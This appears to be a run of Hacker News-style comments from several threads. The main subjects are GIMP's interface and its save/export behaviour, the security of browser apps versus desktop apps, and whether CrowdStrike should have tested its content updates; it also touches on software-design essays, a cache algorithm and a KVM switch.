I use Gimp from time to time, and often get frustrated with its... unique UI. It's nice to see they're hearing feedback and working on it :D
A tip for others that feel the same: if you've used Photoshop before and are used to its UI, try the free Photopea website. It's a Photoshop "clone" that works really well in web (I believe it's a solo dev doing it too). It's replaced Gimp for me lately.
> Websites[...] can sneakily copy the files you are working with
You have made one of the most baffling logical errors that commonly crop up when people criticize browser-based apps.
Browser-based apps execute in a sandbox. They are more constrained in what they can do in comparison to a traditional program running on your machine. Any nefarious thing a browser-based app can do, a local program can do, too, and not just that, but they can do it in a way that's much harder to detect and/or counteract.
There are good reasons available if you want to criticize browser-based apps. This is not one of them.
i can remove network access capabilities from a desktop app after it is installed. i can't easily do that with an app running in a browser.
likewise monitoring and detecting network access per application is easy. tracking down which browser tab is making which network connection is a lot harder.
i am using that already. at least in firefox the network tab only shows which destinations generate traffic. it does not show which tab the traffic comes from. since any page can connect to multiple destinations, not just the one where the page is loaded from, this is not enough to identify the culprit.
you are not wrong on the comparison but you miss the tools available to contain a desktop application that are not available for a browser application. by default a browser application is more limited than a desktop application, but those limitations also reduce the possible functionality of a browser application, and they are locked in place as far as i am aware of.
for a desktop application, at least on linux there are tools available to further constrain its access to the system by monitoring its activity, removing capabilities or placing the app in a container or even a VM. (VM are available on windows and mac too, but i don't know about other features)
to contain a browser app in this way i would have to run a contained copy of the browser as a whole, and i still can't easily limit network access.
further, almost all desktop applications on linux come from a trusted source or a trusted intermediary and have undergone at least some kind of review, whereas browser applications can be reviewed but it is non-trivial to ascertain that i am running the exact same version that was reviewed.
it is possible, and it is my hope for all this to change. i actually believe browser applications are a good idea, but the ability to audit, and constrain browser applications needs to improve a lot for that to happen.
I am not sure about your level of computer literacy, so sorry in advance if I give a a overly detailed response.
Certainly a website is allowed to process files you upload to it and the javascript are allowed to XMLHttpRequest in that sandbox.
This is outside the control of the user. While had it been an app running locally, I could restrict network access or other resources.
Of course the web developer can chose to process the file client side only, but generally when you upload a file to a website, it gets uploaded and processed by their servers.
Surely you can verify this yourself while using the website, but I am confident that most users of a website wouldn't do that and be none the wiser how their data is being processed.
TLDR: I don't believe the average web user is capable of distinguishing a webapp that works in offline-only mode from a ordinary website.
> I am not sure about your level of computer literacy, so sorry in advance if I give a a overly detailed response
In technical discussions, this is what I call "The Move". It comes from a desire to position the person making The Move as more knowledgeable and experienced and therefore correct and the other person as relatively new, inexperienced, lacking in wisdom, and naive. It's extremely sophomoric and perversely favored by those who lack the attributes they're trying to project. Don't do it.
I know how browsers and web apps work. I'm a former Mozillian, and among other things, I wrote, edited, and maintained the JS docs on developer.mozilla.org.
Even aside from The Move, nothing else that you wrote out here is especially relevant. The central observation I made is that users have more reason to be circumspect of non-browser based programs that they download and run than they do of browser-based programs because any nefarious thing a browser-based app can do, a native executable can do, too—or worse.
Anyone who has a gut feeling to the contrary is doing exactly that: operating on vibes and intuition and trying to reason with their gut instead of using actual reason to do what is ultimately a straightforward calculation.
(And the thing is, you and everyone else in your camp already knows the truths I've written out here. If you disagree, then we'll set aside one day a year that we'll call Native App Day. For Native App Day, browsers will refuse to execute browser-based apps. Instead everyone who publishes a web app will agree to publish programs packaged in the native executable format for Mac, Windows, and Linux, and everyone who typically uses the web app will run these executables with the same alacrity they apply when they undertake to use the web app. This will be strictly enforced, and there will be no cheating by folks who just refuse to use the computer on Native App Day.)
>> I am not sure about your level of computer literacy, so sorry in advance if I give a a overly detailed response
> In technical discussions, this is what I call "The Move". It comes from a desire to position the person making The Move as more knowledgeable and experienced and therefore correct and the other person as relatively new, inexperienced, lacking in wisdom, and naive. It's extremely sophomoric and perversely favored by those who lack the attributes they're trying to project. Don't do it.
Nonsense. Judging from your previous post it is apparent you are speaking outside of your expertise. Smearing labels all over rather than factually responding only makes it more so.
You claimed sandboxed browser apps was "more secure" than a traditional app.
Nobody suggested otherwise. In fact, we weren't discussing brower sandbox security model up to that point, but the differences between a online-only closed source web app and a traditional FOSS app.
> I know how browsers and web apps work.
So do the lot of us here, yet you don't seem to share a common understanding of the domain.
You do have a skewed understanding of the web app and seem to fail to understand why people would want a traditional app they could inspect and lock down as they please.
This suggest to me you are junior and/or suffering from a bit of Dunning Kruger because you might be skilled in other areas (in this case skilled in web dev and unskilled in traditional app dev), hence my previous comment about your skill level.
You responded to a lengthy post I made, and yet you fail to address any of the points raised.
> The central observation I made
.. was questioned by me and others and you just ignore what was said.
> And the thing is, you and everyone else in your camp already knows the truths I've written out here.
Get off your high horse.
You haven't shared shared any truths, you haven't addressed the issues we raised and you have a rather rude tone saying things like:
> You have made one of the most baffling logical errors that commonly crop up when people criticize browser-based apps.
Krita works well for me on linux, but I get a lot of random crashes and weird graphics issues on Mac, It’s not worth it there for me. Not idea about windows.
There's habits sure, but GIMP also just has a lot of bad UI. For instance if you insert text, you have to click exactly on the black region of the character to select the text. This is really awkward because it means when you click on a letter to try and move some text, sometimes your click will go through the hole in the middle of the letter and select the thing behind the text. Also worth noting that this update is the one allowing people to edit rotated text and it took 20+ years. This is really bad UI/UX.
That's interesting. I have used and enjoyed a ton of software in different domains (from nothingreal shake to gnu ed) and so far gimp still wins the gold medals of triggering me. A rare feat.
Many years ago, I lost my work because of this "unique UI" and pledge never to use Gimp again, unless its behavior changed.
When you open a non-Gimp file, for instance a PNG, and you want to update the source file, you need to "export" to PNG. And if you close the tab, Gimp warns you that your work isn't saved, because it hasn't been saved in its native xcf format. There is no way to know if the work has been saved to the original file. At least, that was the behavior at the time.
So I had opened a dozen of (versioned) PNG files, modified them, then overwritten the PNG files. On closing, Gimp warned me that none of the images was saved. I ignored the warning since I didn't want to track the changes in xcf files. It turned out one the files had not been "exported" to PNG.
This is standard behavior in pretty much any kind of art/content creation app. You have a project file which can be saved and reopened in the app, saving the state of the layers/effects/etc to be edited later, and can “export” a final render to a specific format for your medium. Image/video editing, digital audio workstations, 3D-modeling programs, they all behave like this, for good reason since it usually takes a long time to export to a specific format, and when you do, you lose the ability to change anything.
Think of it like source code, and each exportable file type is like a compilation target.
This is one of the weirder design changes that Gimp made, and it wasn't always that way. IIRC, the "save" option worked as you described in 2.0 but changed to the newer behaviour in either 2.2 or 2.4. Baffling because it really does change the workflow and coupled with the GTK+ load/save dialog boxes, it really has become much less intuitive than it used to be.
There is literally an "overwrite file" command in the file menu.
You didn't lose data because of bad UI but because you are illiterate. You just said it, it warns you. If you can't understand what "none of the images was saved" means, there is no UI that can save you except autosave. But autosave is something you clearly don't want in a photo/image editor, even smartphone apps do not autosave photo edits.
Photoshop has autosave that works well, even for files with hundreds of layers, so it can be done. That being said, I can see that it's less useful when someone chooses not to save.
As for export, a single-layer file should be considered saved when one exports to lossless. A multi-layer file needs a different prompt, and I note Gimp has that now. It flags the file as "Exported to xxxxxx.png" in the Quit dialog.
autosave is useful for a file format of working files, like psd if non destructive changes are supported. But it would be stupid for exported end result format like jpeg, png, webp or pdf where changes cannot be recorded.
Yes, even though I never use photoshop and used Gimp for over 15 years it's a frustrating UI. I dislike it. Non destructive editing is a big upgrade though.
I also use Photopea from time to time. Can recommend.
If only a mad man would make a Photopea/Photoshop clone open source, then everyone (who has the skills) would be able to not only use a decent open source image editor, but one that can be fully customized to your needs.
Takes more time than reading the article, but the podcast has IMO a nice pace of leaving you curious and giving you info. It includes opinions from teachers, parents, etc.
"in the future, the fastest humans on the planet might be a quadrupedal runner at the 2048 Olympics, which may be achieved by shifting up to the rotary gallop and taking longer strides with wide sagittal trunk motion."
> They protect these many companies, industries and even countries at such a global scale and you haven't even heard of them in the last 15 years of their operation
I certainly don't want to know (through disaster news) about the construction company that built the bridge I drive through everyday, not for another 15 years, not ever!
This kind of software simply should not fail, with such a massive install base on so many sensitive industries. We're better than that, the software industry is starting to mature and there are simple and widely-known procedures that could have been used to prevent it.
I have no idea how CrowdStrike stock has only dropped 10% to the values of 2 months ago. Actually, if the financial troubles you get into are only these, take back what I said, software should be failing a lot (why spend money on robustness when you don't lose money on bugs?)
working in software, you should know how insanely complex software is, even google, amazon, microsoft, cloudflare and such have outages. mistakes happen because humans are involved. it is the nature and risk of depending complex systems. bridges by comparison are not that complicated.
I actually expected their stock to drop a lot more than this, but goes to show you how valuable they are. investors know that any dip is only temporary because no one is getting rid of crowdstrike.
Think of the security landscape as early 90's new york city at night and crowdstrike as the big bulky guy with lots of guns who protects you for a fee, if he makes a mistakes and hurts you, you will be mad but in the end your need for protection does not suddenly go away and it was a one time mistake.
In the 3-4 decades of the security industry, testing signature files to see if they trigger a corner case system crash has never been practiced. You and others are proclaiming yourselves to be experts in an area of technology you have no experience in. This was not a software update!!
Then that's 3-4 decades of massive incompetence, isn't it? "Testing before pushing an update" is basic engineering, they have a huge scale so huge responsibility, and they have the money to perform the tests and hire people who aren't entirely stupid. That's gross malpractice.
testing for software, not for content. you test, and fuzz the software that processes the updates, not the content files themselves. it's like a post on HN crashing HN and you claiming HN should have tested each post before allowing it to be displayed. you test code not data, and I dare you to back up any claim that data processed by software should also be tested in the same way. Everyone is suddenly an expert in AV content updates lol.
I used to work for Microsoft in a team adjacent to the Defender team that worked on signature updates and I know for sure that these were tested before being rolled out - I saw the Azure Devops pipelines they used to do this. If other companies aren't doing this then that's their incompetence but be assured that it's not industry-wide.
I'm not saying they don't test them, I'm saying they don't do code tests, as in unit tests and all that. I have no idea what they do, I'm just speculating here, but if in fact they do no testing at all, then I agree that would be pretty bad.I would think their testing would be for how well it detects things and/or performance impact and I'd expect it to be automated deployment (i.e.: test cases are passing = gets deployed), i guess they don't have "did the system crash" check in their pipelines? In your experience at MS, did they test for system/sensor availability impact?
A config file IS code. And yes, even a post can theoretically break a site (SQL injection, say), so if you're pushing data to a million PCs you'd better be testing it.
You're right, but "testing" could mean anything, you'd need to have the foresight to anticipate the config crashing the program. Is it common to test for that scenario with config files?
Moseley and Marks "Out of the tar pit" is a nice essay / paper.
Ousterhout's "A Philosophy of Software Design" goes along the same vein, not an essay but a short book.
Both of these agree on something that I really relate with: the main thing to keep in mind in a software project is complexity.
Managing complexity to reduce cognitive load on programmers is something I always have in mind, it works not only within a codebase, but also across codebases that talk to each other through APIs, and even across software teams when considering their boundaries and modes of communication.
I watched it again and read the algorithm description part, and I think you're right - D should have been switched to false, as the hand was pointing to it when a cache miss happened.
The behavior is inconsistent with what happens to A and B at the very beginning.
Whenever the hand skips a visited node in search of an unvisited one, it must flip it to unvisited.
If D were given this special treatment every time the hand cycles around, it will forever stay in the cache even if not accessed (D-plomatic immunity?)
I'm not that knowledgeable in this department, but: if the BDFL is really hurting the usability of their library / service, can't it just be forked by more benevolent actors?
A basic KVM switch [0]. Got tired of switching my mouse, keyboard and monitor cables between my work laptop and my desktop PC. This makes it a 1 button press.
During the day desktop PC is off and I work on my laptop, then I turn it off and switch to the desktop PC. With synergy one would always have to be on.
A tip for others that feel the same: if you've used Photoshop before and are used to its UI, try the free Photopea website. It's a Photoshop "clone" that works really well in web (I believe it's a solo dev doing it too). It's replaced Gimp for me lately.